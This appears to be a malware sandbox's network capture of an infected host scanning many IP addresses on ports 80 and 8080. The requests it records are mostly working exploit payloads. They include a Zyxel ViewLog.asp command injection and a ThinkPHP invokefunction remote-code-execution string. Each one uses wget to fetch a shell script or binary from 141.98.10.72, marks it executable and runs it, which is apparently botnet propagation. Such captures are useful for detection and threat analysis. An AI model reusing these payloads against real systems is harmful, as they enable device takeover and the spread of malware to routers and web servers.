Feb 14, 2024 09:29:05.818572044 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.15	46436	112.29.170.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.146719933 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.15	44408	95.171.211.68	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.561089993 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:06.818679094 CET	109	IN	HTTP/1.1 302 Found Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.15	58510	94.123.73.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.580446959 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
109	192.168.2.15	50950	85.233.76.98	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.580446959 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:09.658715963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:15.802678108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:27.834167957 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:52.153512001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
110	192.168.2.15	58878	95.230.167.35	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.779339075 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:07.005017042 CET	339	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:06 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.15	59968	94.136.146.230	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.797727108 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.15	38602	31.200.89.71	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.806840897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.15	35648	94.123.61.209	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.836155891 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.938668966 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:17.082585096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:29.114276886 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.201436043 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:43.352257967 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.15	42988	94.110.186.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:06.855119944 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.15	43844	62.219.113.63	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:07.040513992 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.15	45506	94.120.238.8	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:07.542685032 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.15	42298	94.123.60.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:07.542778969 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.15	33956	94.123.18.115	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:07.543037891 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.15	39656	94.122.31.81	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:07.544389963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.15	43004	95.100.105.189	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:08.720880032 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:08.937550068 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:08 GMT Date: Wed, 14 Feb 2024 08:29:08 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 37 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 38 26 23 34 36 3b 35 66 39 62 63 65 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3d79dd58.1707899348.5f9bce1d</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.15	43532	95.181.203.44	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:08.750036955 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:08.995486021 CET	337	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Wed, 14 Feb 2024 08:29:08 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.15	58916	95.153.253.45	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:08.781543016 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:09.071739912 CET	62	IN	HTTP/1.0 400 Bad Request Connection: Keep-Alive
Feb 14, 2024 09:29:09.071752071 CET	83	IN	Data Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.15	52464	95.101.116.48	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:08.916682005 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.15	57094	95.49.0.208	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:08.989994049 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:09.229943037 CET	330	IN	HTTP/1.0 400 Bad Request Cache-Control: no-store Connection: close Content-Length: 129 Date: Wed, 14 Feb 2024 08:29:09 GMT Expires: 0 Pragma: no-cache X-Frame-Options: sameorigin Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!doctype html><html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.15	52274	95.57.108.51	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:09.207734108 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:09.499269009 CET	29	IN	HTTP/1.1 200 OK
